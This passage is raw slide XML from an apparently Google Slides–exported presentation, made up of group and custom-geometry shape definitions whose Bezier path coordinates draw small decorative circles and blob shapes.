            <a:off x="-2" y="9"/>
            <a:ext cx="3985907" cy="3918269"/>
            <a:chOff x="2524675" y="238075"/>
            <a:chExt cx="1178600" cy="1158600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="851" name="Google Shape;851;p59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5" name="Google Shape;905;p59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5158098" y="1225234"/>
            <a:ext cx="3985907" cy="3918269"/>
            <a:chOff x="2524675" y="238075"/>
            <a:chExt cx="1178600" cy="1158600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="906" name="Google Shape;906;p59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3497400" y="667150"/>
              <a:ext cx="10425" cy="10450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="418" w="417">
                  <a:moveTo>
                    <a:pt x="208" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="0"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="348"/>
                    <a:pt x="69" y="417"/>
                    <a:pt x="208" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="417"/>
                    <a:pt x="417" y="348"/>
                    <a:pt x="417" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="106"/>
                    <a:pt x="314" y="0"/>
                    <a:pt x="20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3513025" y="588975"/>
              <a:ext cx="18300" cy="18300"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="732" w="732">
                  <a:moveTo>
                    <a:pt x="384" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="1"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="0" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="557"/>
                    <a:pt x="175" y="732"/>
                    <a:pt x="384" y="732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="732"/>
                    <a:pt x="731" y="557"/>
                    <a:pt x="731" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="731" y="140"/>
                    <a:pt x="592" y="1"/>
                    <a:pt x="38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3046675" y="353650"/>
              <a:ext cx="18225" cy="18225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="729" w="729">
                  <a:moveTo>
                    <a:pt x="348" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="1"/>
                    <a:pt x="0" y="173"/>
                    <a:pt x="0" y="382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="557"/>
                    <a:pt x="139" y="729"/>
                    <a:pt x="348" y="729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="729"/>
                    <a:pt x="729" y="557"/>
                    <a:pt x="729" y="382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="729" y="173"/>
                    <a:pt x="556" y="1"/>
                    <a:pt x="348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3635525" y="746225"/>
              <a:ext cx="13900" cy="13000"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="520" w="556">
                  <a:moveTo>
                    <a:pt x="278" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="0"/>
                    <a:pt x="0" y="103"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="417"/>
                    <a:pt x="139" y="520"/>
                    <a:pt x="278" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="520"/>
                    <a:pt x="556" y="417"/>
                    <a:pt x="556" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="103"/>
                    <a:pt x="417" y="0"/>
                    <a:pt x="27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3680675" y="866075"/>
              <a:ext cx="6075" cy="5225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="209" w="243">
                  <a:moveTo>
                    <a:pt x="103" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="173"/>
                    <a:pt x="70" y="209"/>
                    <a:pt x="103" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="209"/>
                    <a:pt x="242" y="173"/>
                    <a:pt x="242" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="34"/>
                    <a:pt x="173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3614675" y="940750"/>
              <a:ext cx="7800" cy="7825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="313" w="312">
                  <a:moveTo>
                    <a:pt x="139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3"/>
                    <a:pt x="70" y="312"/>
                    <a:pt x="139" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="312"/>
                    <a:pt x="312" y="243"/>
                    <a:pt x="312" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="70"/>
                    <a:pt x="242" y="1"/>
                    <a:pt x="13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3370600" y="819175"/>
              <a:ext cx="7875" cy="7800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="312" w="315">
                  <a:moveTo>
                    <a:pt x="139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="0"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="242"/>
                    <a:pt x="69" y="312"/>
                    <a:pt x="139" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="312"/>
                    <a:pt x="314" y="242"/>
                    <a:pt x="314" y="173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3692825" y="97112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4" y="0"/>
                    <a:pt x="1" y="106"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="348"/>
                    <a:pt x="104" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="417"/>
                    <a:pt x="418" y="348"/>
                    <a:pt x="418" y="209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3678025" y="584675"/>
              <a:ext cx="11350" cy="10450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="418" w="454">
                  <a:moveTo>
                    <a:pt x="209" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1"/>
                    <a:pt x="1" y="103"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="312"/>
                    <a:pt x="106" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="417"/>
                    <a:pt x="454" y="312"/>
                    <a:pt x="454" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="103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3508725" y="48477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0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="0"/>
                    <a:pt x="0" y="36"/>
                    <a:pt x="0" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="69" y="209"/>
                    <a:pt x="103" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="209"/>
                    <a:pt x="208" y="175"/>
                    <a:pt x="208" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="36"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="103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3587700" y="488250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0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="0"/>
                    <a:pt x="1" y="70"/>
                    <a:pt x="1" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="278"/>
                    <a:pt x="70" y="347"/>
                    <a:pt x="176" y="347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="347"/>
                    <a:pt x="315" y="278"/>
                    <a:pt x="315" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="70"/>
                    <a:pt x="245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2590675" y="7219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1" y="103"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="348"/>
                    <a:pt x="70" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="417"/>
                    <a:pt x="418" y="348"/>
                    <a:pt x="418" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="103"/>
                    <a:pt x="315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2643700" y="910325"/>
              <a:ext cx="7800" cy="7875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="315" w="312">
                  <a:moveTo>
                    <a:pt x="173" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="1"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="70" y="315"/>
                    <a:pt x="173" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="315"/>
                    <a:pt x="312" y="245"/>
                    <a:pt x="312" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="70"/>
                    <a:pt x="242" y="1"/>
                    <a:pt x="17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2628050" y="473500"/>
              <a:ext cx="13025" cy="13925"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="557" w="521">
                  <a:moveTo>
                    <a:pt x="243" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="1"/>
                    <a:pt x="1" y="140"/>
                    <a:pt x="1" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="418"/>
                    <a:pt x="104" y="557"/>
                    <a:pt x="243" y="557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="557"/>
                    <a:pt x="521" y="418"/>
                    <a:pt x="521" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="140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2711425" y="423125"/>
              <a:ext cx="11300" cy="10450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="418" w="452">
                  <a:moveTo>
                    <a:pt x="209" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="1"/>
                    <a:pt x="1" y="104"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="348"/>
                    <a:pt x="104" y="418"/>
                    <a:pt x="209" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="418"/>
                    <a:pt x="451" y="348"/>
                    <a:pt x="451" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="104"/>
                    <a:pt x="348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2823450" y="422225"/>
              <a:ext cx="7875" cy="7875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="315" w="315">
                  <a:moveTo>
                    <a:pt x="175" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="1"/>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="69" y="315"/>
                    <a:pt x="175" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="315"/>
                    <a:pt x="314" y="245"/>
                    <a:pt x="314" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="70"/>
                    <a:pt x="245" y="1"/>
                    <a:pt x="175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2628900" y="350175"/>
              <a:ext cx="24350" cy="23450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="938" w="974">
                  <a:moveTo>
                    <a:pt x="487" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="1"/>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="729"/>
                    <a:pt x="209" y="937"/>
                    <a:pt x="487" y="937"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="731" y="937"/>
                    <a:pt x="973" y="729"/>
                    <a:pt x="973" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="973" y="209"/>
                    <a:pt x="731" y="1"/>
                    <a:pt x="487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2524675" y="617675"/>
              <a:ext cx="8700" cy="8725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="349" w="348">
                  <a:moveTo>
                    <a:pt x="176" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="1"/>
                    <a:pt x="1" y="70"/>
                    <a:pt x="1" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="242"/>
                    <a:pt x="70" y="348"/>
                    <a:pt x="176" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="348"/>
                    <a:pt x="348" y="242"/>
                    <a:pt x="348" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348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2675800" y="10102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0" y="69"/>
                    <a:pt x="0" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="311"/>
                    <a:pt x="106" y="417"/>
                    <a:pt x="209" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="417"/>
                    <a:pt x="417" y="311"/>
                    <a:pt x="417" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="69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3659825" y="425700"/>
              <a:ext cx="15675" cy="16575"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="663" w="627">
                  <a:moveTo>
                    <a:pt x="312" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="1"/>
                    <a:pt x="1" y="140"/>
                    <a:pt x="1" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="523"/>
                    <a:pt x="140" y="662"/>
                    <a:pt x="312" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="662"/>
                    <a:pt x="626" y="523"/>
                    <a:pt x="626" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626" y="140"/>
                    <a:pt x="487" y="1"/>
                    <a:pt x="31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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2648000" y="449175"/>
              <a:ext cx="31600" cy="26675"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1067" w="1264">
                  <a:moveTo>
                    <a:pt x="682" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="698" y="137"/>
                    <a:pt x="715" y="138"/>
                    <a:pt x="732" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="173"/>
                    <a:pt x="973" y="418"/>
                    <a:pt x="940" y="590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="922" y="715"/>
                    <a:pt x="876" y="794"/>
                    <a:pt x="809" y="851"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="809" y="851"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="800" y="843"/>
                    <a:pt x="783" y="835"/>
                    <a:pt x="765" y="835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="733" y="877"/>
                    <a:pt x="700" y="910"/>
                    <a:pt x="666" y="934"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="666" y="934"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="632" y="948"/>
                    <a:pt x="595" y="961"/>
                    <a:pt x="556" y="974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554" y="977"/>
                    <a:pt x="551" y="979"/>
                    <a:pt x="549" y="982"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="549" y="982"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="538" y="984"/>
                    <a:pt x="527" y="984"/>
                    <a:pt x="516" y="984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="984"/>
                    <a:pt x="253" y="856"/>
                    <a:pt x="209" y="660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="398"/>
                    <a:pt x="418" y="137"/>
                    <a:pt x="682" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="654" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="645" y="0"/>
                    <a:pt x="636" y="1"/>
                    <a:pt x="626" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="34"/>
                    <a:pt x="1" y="382"/>
                    <a:pt x="106" y="765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="958"/>
                    <a:pt x="307" y="1054"/>
                    <a:pt x="458" y="1054"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="1054"/>
                    <a:pt x="519" y="1050"/>
                    <a:pt x="549" y="1043"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="549" y="1043"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="552" y="1043"/>
                    <a:pt x="554" y="1043"/>
                    <a:pt x="556" y="1043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="1059"/>
                    <a:pt x="633" y="1066"/>
                    <a:pt x="669" y="1066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="1066"/>
                    <a:pt x="1264" y="0"/>
                    <a:pt x="654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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3425350" y="388400"/>
              <a:ext cx="13000" cy="13025"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="521" w="520">
                  <a:moveTo>
                    <a:pt x="242" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="0" y="103"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="417"/>
                    <a:pt x="103" y="520"/>
                    <a:pt x="242" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="520"/>
                    <a:pt x="520" y="417"/>
                    <a:pt x="520" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="103"/>
                    <a:pt x="417" y="0"/>
                    <a:pt x="24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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3446175" y="364000"/>
              <a:ext cx="30800" cy="26550"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1062" w="1232">
                  <a:moveTo>
                    <a:pt x="772" y="821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="772" y="821"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="769" y="821"/>
                    <a:pt x="765" y="825"/>
                    <a:pt x="765" y="837"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="787" y="837"/>
                    <a:pt x="780" y="821"/>
                    <a:pt x="772" y="821"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="649" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="665" y="104"/>
                    <a:pt x="680" y="105"/>
                    <a:pt x="696" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904" y="143"/>
                    <a:pt x="937" y="421"/>
                    <a:pt x="904" y="559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="712"/>
                    <a:pt x="817" y="811"/>
                    <a:pt x="730" y="880"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="730" y="880"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="742" y="867"/>
                    <a:pt x="754" y="853"/>
                    <a:pt x="765" y="837"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="765" y="837"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="679" y="922"/>
                    <a:pt x="589" y="960"/>
                    <a:pt x="505" y="960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="960"/>
                    <a:pt x="218" y="831"/>
                    <a:pt x="173" y="629"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="366"/>
                    <a:pt x="384" y="104"/>
                    <a:pt x="649" y="104"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="643" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="626" y="1"/>
                    <a:pt x="608" y="2"/>
                    <a:pt x="590" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="4"/>
                    <a:pt x="1" y="384"/>
                    <a:pt x="104" y="732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="925"/>
                    <a:pt x="296" y="1022"/>
                    <a:pt x="439" y="1022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="1022"/>
                    <a:pt x="501" y="1018"/>
                    <a:pt x="531" y="1009"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="531" y="1009"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535" y="1020"/>
                    <a:pt x="543" y="1033"/>
                    <a:pt x="557" y="1046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="1057"/>
                    <a:pt x="617" y="1062"/>
                    <a:pt x="645" y="1062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1058" y="1062"/>
                    <a:pt x="1231" y="1"/>
                    <a:pt x="64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3565125" y="564800"/>
              <a:ext cx="22600" cy="21175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="847" w="904">
                  <a:moveTo>
                    <a:pt x="471" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="575" y="127"/>
                    <a:pt x="672" y="210"/>
                    <a:pt x="695" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="343"/>
                    <a:pt x="765" y="448"/>
                    <a:pt x="732" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="732" y="538"/>
                    <a:pt x="728" y="555"/>
                    <a:pt x="721" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="721" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="589"/>
                    <a:pt x="700" y="605"/>
                    <a:pt x="688" y="620"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="688" y="620"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="667" y="643"/>
                    <a:pt x="642" y="664"/>
                    <a:pt x="622" y="685"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="622" y="685"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="721"/>
                    <a:pt x="517" y="739"/>
                    <a:pt x="459" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="739"/>
                    <a:pt x="314" y="712"/>
                    <a:pt x="245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8" y="140"/>
                    <a:pt x="430" y="127"/>
                    <a:pt x="471" y="127"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="462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37" y="240"/>
                    <a:pt x="1" y="551"/>
                    <a:pt x="209" y="759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="819"/>
                    <a:pt x="356" y="846"/>
                    <a:pt x="429" y="846"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="483" y="846"/>
                    <a:pt x="536" y="831"/>
                    <a:pt x="585" y="803"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="585" y="803"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="804"/>
                    <a:pt x="591" y="804"/>
                    <a:pt x="594" y="804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="804"/>
                    <a:pt x="613" y="802"/>
                    <a:pt x="626" y="796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="759"/>
                    <a:pt x="904" y="412"/>
                    <a:pt x="801" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="729" y="87"/>
                    <a:pt x="595" y="1"/>
                    <a:pt x="46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2581175" y="556825"/>
              <a:ext cx="23425" cy="20875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="835" w="937">
                  <a:moveTo>
                    <a:pt x="461" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="119"/>
                    <a:pt x="674" y="199"/>
                    <a:pt x="728" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="764" y="350"/>
                    <a:pt x="764" y="420"/>
                    <a:pt x="764" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="757" y="509"/>
                    <a:pt x="749" y="527"/>
                    <a:pt x="740" y="545"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="740" y="545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="544"/>
                    <a:pt x="737" y="544"/>
                    <a:pt x="736" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="731" y="544"/>
                    <a:pt x="728" y="548"/>
                    <a:pt x="728" y="559"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="718" y="580"/>
                    <a:pt x="706" y="600"/>
                    <a:pt x="693" y="617"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="693" y="617"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="681" y="633"/>
                    <a:pt x="669" y="648"/>
                    <a:pt x="655" y="663"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="655" y="663"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="718"/>
                    <a:pt x="534" y="745"/>
                    <a:pt x="468" y="745"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="745"/>
                    <a:pt x="334" y="717"/>
                    <a:pt x="278" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
